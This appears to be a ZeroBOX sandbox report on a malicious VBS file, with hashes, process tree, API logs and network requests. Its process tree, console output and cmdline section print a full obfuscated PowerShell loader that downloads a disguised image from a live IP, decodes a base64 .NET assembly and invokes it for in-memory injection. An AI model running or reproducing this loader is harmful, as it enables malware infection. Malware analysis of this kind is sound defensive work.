popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

eveningfiledatinglover.vbs

Generic Malware Antivirus Hide_URL PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 July 4, 2024, 10:39 a.m. July 4, 2024, 10:41 a.m.
Size 3.4KB
Type Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
MD5 e69758681e577aa06dfa9425821283b6
SHA256 61eb554843c600f6721a79589a31c5c198308ba747c1504af03f5099f6dfdd69
CRC32 954FC5E1
ssdeep 96:c4ZP+quO+uCBZPWH9rd9rQ9r2JZPp9rNU:zhIh8pdpQp2Jhppi
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\eveningfiledatinglover.vbs

    2560

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('5gclink = aonhttp://91.92.254.194/imge/new-image_v.jpgaon; 5gcwebClient = New-Object System.Net.WebClient; try'+' { 5gcdownloadedData = 5gcwebClient.DownloadData(5gclink'+') } catch { Write-Host aonFailed To download data from 5gclinkaon -ForegroundColor Red; exit }; if (5gcdownloadedData -ne 5gc'+'nu'+'ll) { 5gcimageText = [S'+'ystem.Text.Enc'+'oding]::UTF8.GetString(5gcdownloadedData); 5gcstartFlag = aon'+'<<BASE64_'+'START>>aon; 5gcendFlag = aon'+'<<BASE64_END>>aon; 5gcstartIndex = 5gcimageText.In'+'dexOf(5gcstartFlag); 5gcendIndex = 5gcimage'+'Text.IndexOf(5gcendFlag); if (5gcstartIndex -ge 0 -'+'and 5gcen'+'dIndex -gt 5gcstartIndex) { 5gcst'+'artIndex += 5gcstartFl'+'ag.Length; 5gc'+'base64Length = 5gcendIndex '+'- '+'5gc'+'startInde'+'x; 5gcb'+'ase64Command '+'= 5gcimageT'+'ext.Substring(5gcstartIndex, 5'+'gcbase64Length); 5gccommandBytes = [System.Convert]::FromBase64String(5gcbase64Command); 5gcloadedAssembly = [System.Reflection.As'+'sembl'+'y]::Load(5gccommandBytes); 5g'+'ctype = 5gcload'+'edAssembly'+'.GetType(aonRunPE.Homeaon); 5gcmethod = 5gc'+'type.GetMethod(aonVAIaon).Invoke(5g'+'cnull, [object[]] (aontxt.4446sabbbbbbbewmadam/441.871.6'+'4.891//:ptth'+'a'+'on , aondesativadoaon , aondesativadoaon , aondesativadoaon,aon'+'AddInProcess32aon,aonaon)) } }')-ReplacE([chaR]97+[chaR]111+[chaR]110),[chaR]39 -ReplacE '5gc',[chaR]36)| & ((vARiaBle '*MDR*').naMe[3,11,2]-JOIn'')"

      2692

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
91.92.254.14 Active Moloch
91.92.254.194 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception calling "Invoke" with "2" argument(s): "The requested security protoc
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: ol is not supported."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At line:1 char:917
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + $link = 'http://91.92.254.194/imge/new-image_v.jpg'; $webClient = New-Object
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) }
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; e
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: xit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UT
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: F8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<B
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: ASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageT
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: ext.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) {
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $bas
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: e64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes =
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.R
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: eflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunP
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: E.Home'); $method = $type.GetMethod('VAI').Invoke <<<< ($null, [object[]] ('txt
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: .4446sabbbbbbbewmadam/441.871.64.891//:ptth' , 'desativado' , 'desativado' , 'd
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: esativado','AddInProcess32','')) } }
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodTargetInvocation
console_handle: 0x000000fb
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006ca910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006ca750
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006ca750
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006ca750
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb010
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb150
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb490
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb3d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb3d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb450
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb450
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb450
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb450
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb450
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006cb450
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features Connection to IP address suspicious_request GET http://91.92.254.14/Users_API/negrocock/file_in0kfcuh.ojw.txt
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://91.92.254.194/imge/new-image_v.jpg
request GET http://91.92.254.14/Users_API/negrocock/file_in0kfcuh.ojw.txt
request GET http://91.92.254.194/imge/new-image_v.jpg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027d0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02830000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71951000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71952000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02662000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02831000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02832000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02673000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02674000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02675000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02676000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a51000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a53000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a54000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a55000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a56000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a57000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a59000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a5a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a5b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a5d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a5e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a5f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a61000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a62000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a63000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2692
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a64000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -Command "(('5gclink = aonhttp://91.92.254.194/imge/new-image_v.jpgaon; 5gcwebClient = New-Object System.Net.WebClient; try'+' { 5gcdownloadedData = 5gcwebClient.DownloadData(5gclink'+') } catch { Write-Host aonFailed To download data from 5gclinkaon -ForegroundColor Red; exit }; if (5gcdownloadedData -ne 5gc'+'nu'+'ll) { 5gcimageText = [S'+'ystem.Text.Enc'+'oding]::UTF8.GetString(5gcdownloadedData); 5gcstartFlag = aon'+'<<BASE64_'+'START>>aon; 5gcendFlag = aon'+'<<BASE64_END>>aon; 5gcstartIndex = 5gcimageText.In'+'dexOf(5gcstartFlag); 5gcendIndex = 5gcimage'+'Text.IndexOf(5gcendFlag); if (5gcstartIndex -ge 0 -'+'and 5gcen'+'dIndex -gt 5gcstartIndex) { 5gcst'+'artIndex += 5gcstartFl'+'ag.Length; 5gc'+'base64Length = 5gcendIndex '+'- '+'5gc'+'startInde'+'x; 5gcb'+'ase64Command '+'= 5gcimageT'+'ext.Substring(5gcstartIndex, 5'+'gcbase64Length); 5gccommandBytes = [System.Convert]::FromBase64String(5gcbase64Command); 5gcloadedAssembly = [System.Reflection.As'+'sembl'+'y]::Load(5gccommandBytes); 5g'+'ctype = 5gcload'+'edAssembly'+'.GetType(aonRunPE.Homeaon); 5gcmethod = 5gc'+'type.GetMethod(aonVAIaon).Invoke(5g'+'cnull, [object[]] (aontxt.4446sabbbbbbbewmadam/441.871.6'+'4.891//:ptth'+'a'+'on , aondesativadoaon , aondesativadoaon , aondesativadoaon,aon'+'AddInProcess32aon,aonaon)) } }')-ReplacE([chaR]97+[chaR]111+[chaR]110),[chaR]39 -ReplacE '5gc',[chaR]36)| & ((vARiaBle '*MDR*').naMe[3,11,2]-JOIn'')"
